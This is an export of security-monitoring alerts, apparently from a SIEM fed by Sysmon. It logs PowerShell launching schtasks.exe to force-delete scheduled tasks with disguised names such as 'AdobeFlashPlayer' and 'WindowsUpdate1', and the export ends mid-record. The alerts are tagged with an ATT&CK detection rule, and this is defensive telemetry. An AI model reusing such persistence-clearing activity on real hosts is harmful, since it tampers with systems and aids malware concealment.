+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.706878800Z"",""eventRecordID"":""3306"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.704\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001007ca2b00}\r\nProcessId: 5196\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:33.704"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001007ca2b00}"",""processId"":""5196"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.164",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.646 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010a9c72b00} +ProcessId: 3668 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN FlashPlayer1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
+IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.654588600Z"",""eventRecordID"":""3305"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.646\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010a9c72b00}\r\nProcessId: 3668\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN FlashPlayer1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 
6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.646"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010a9c72b00}"",""processId"":""3668"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN FlashPlayer1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.076",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.608 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010a7c52b00} +ProcessId: 5616 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: 
""C:\Windows\system32\schtasks.exe"" /Delete /TN AdobeFlashPlayer /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.612169900Z"",""eventRecordID"":""3304"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.608\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010a7c52b00}\r\nProcessId: 5616\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN AdobeFlashPlayer /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 
1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.608"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010a7c52b00}"",""processId"":""5616"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN AdobeFlashPlayer /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:04.005",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.567 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001038c32b00} 
+ProcessId: 868 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate3 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.570795300Z"",""eventRecordID"":""3303"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.567\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-001038c32b00}\r\nProcessId: 868\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: 
\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate3 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.567"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-001038c32b00}"",""processId"":""868"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate3 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John 
Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:03.992",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.532 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00107ec12b00} +ProcessId: 5660 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate2 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 +ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 
/F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.535413800Z"",""eventRecordID"":""3302"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.532\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-00107ec12b00}\r\nProcessId: 5660\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate2 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 12:51:33.532"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-00107ec12b00}"",""processId"":""5660"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration 
Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate2 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:03.939",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.493 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010c7bf2b00} +ProcessId: 7292 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN WindowsUpdate1 /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 +IntegrityLevel: Medium +Hashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313 +ParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800} +ParentProcessId: 6056 
+ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe +ParentCommandLine: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -Version 5.1 -s -NoLogo -NoProfile""","\""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F",,"{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""1"",""version"":""5"",""level"":""4"",""task"":""1"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-28T12:51:33.504896300Z"",""eventRecordID"":""3301"",""processID"":""2260"",""threadID"":""3256"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Process Create:\r\nRuleName: \r\nUtcTime: 2020-05-28 12:51:33.493\r\nProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010c7bf2b00}\r\nProcessId: 7292\r\nImage: C:\\Windows\\System32\\schtasks.exe\r\nFileVersion: 10.0.18362.175 (WinBuild.160101.0800)\r\nDescription: Task Scheduler Configuration Tool\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: schtasks.exe\r\nCommandLine: \""C:\\Windows\\system32\\schtasks.exe\"" /Delete /TN WindowsUpdate1 /F\r\nCurrentDirectory: C:\\Users\\John Williams\\Documents\\\r\nUser: DESKTOP-HUE026H\\John Williams\r\nLogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300}\r\nLogonId: 0x375FD\r\nTerminalSessionId: 1\r\nIntegrityLevel: Medium\r\nHashes: MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313\r\nParentProcessGuid: {df9fc3d3-b359-5ecf-0000-0010f5eb1800}\r\nParentProcessId: 6056\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\"" -Version 5.1 -s -NoLogo -NoProfile\""""},""eventdata"":{""utcTime"":""2020-05-28 
12:51:33.493"",""processGuid"":""{df9fc3d3-b3d5-5ecf-0000-0010c7bf2b00}"",""processId"":""7292"",""image"":""C:\\\\Windows\\\\System32\\\\schtasks.exe"",""fileVersion"":""10.0.18362.175 (WinBuild.160101.0800)"",""description"":""Task Scheduler Configuration Tool"",""product"":""Microsoft® Windows® Operating System"",""company"":""Microsoft Corporation"",""originalFileName"":""schtasks.exe"",""commandLine"":""\\\""C:\\\\Windows\\\\system32\\\\schtasks.exe\\\"" /Delete /TN WindowsUpdate1 /F"",""currentDirectory"":""C:\\\\Users\\\\John Williams\\\\Documents\\\\"",""user"":""DESKTOP-HUE026H\\\\John Williams"",""logonGuid"":""{df9fc3d3-b279-5ecf-0000-0020fd750300}"",""logonId"":""0x375fd"",""terminalSessionId"":""1"",""integrityLevel"":""Medium"",""hashes"":""MD5=003D681048A63B9862C299F30492CFDF,SHA256=D3222E48A036C6C730BB4E67B4C02E83C87860701975F408E5BF708B4B9CDBF4,IMPHASH=E59000FC08C43F1D70C9403E04909313"",""parentProcessGuid"":""{df9fc3d3-b359-5ecf-0000-0010f5eb1800}"",""parentProcessId"":""6056"",""parentImage"":""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe"",""parentCommandLine"":""\\\""C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\\\"" -Version 5.1 -s -NoLogo -NoProfile""}}}", +"May 29, 2020 @ 14:20:01.589",14,"ATT&CK T1064: Windows Shell Spawning Suspicious Program","""Process Create: +RuleName: +UtcTime: 2020-05-28 12:51:33.460 +ProcessGuid: {df9fc3d3-b3d5-5ecf-0000-0010e7bd2b00} +ProcessId: 8056 +Image: C:\Windows\System32\schtasks.exe +FileVersion: 10.0.18362.175 (WinBuild.160101.0800) +Description: Task Scheduler Configuration Tool +Product: Microsoft® Windows® Operating System +Company: Microsoft Corporation +OriginalFileName: schtasks.exe +CommandLine: ""C:\Windows\system32\schtasks.exe"" /Delete /TN Update_windows /F +CurrentDirectory: C:\Users\John Williams\Documents\ +User: DESKTOP-HUE026H\John Williams +LogonGuid: {df9fc3d3-b279-5ecf-0000-0020fd750300} +LogonId: 0x375FD +TerminalSessionId: 1 
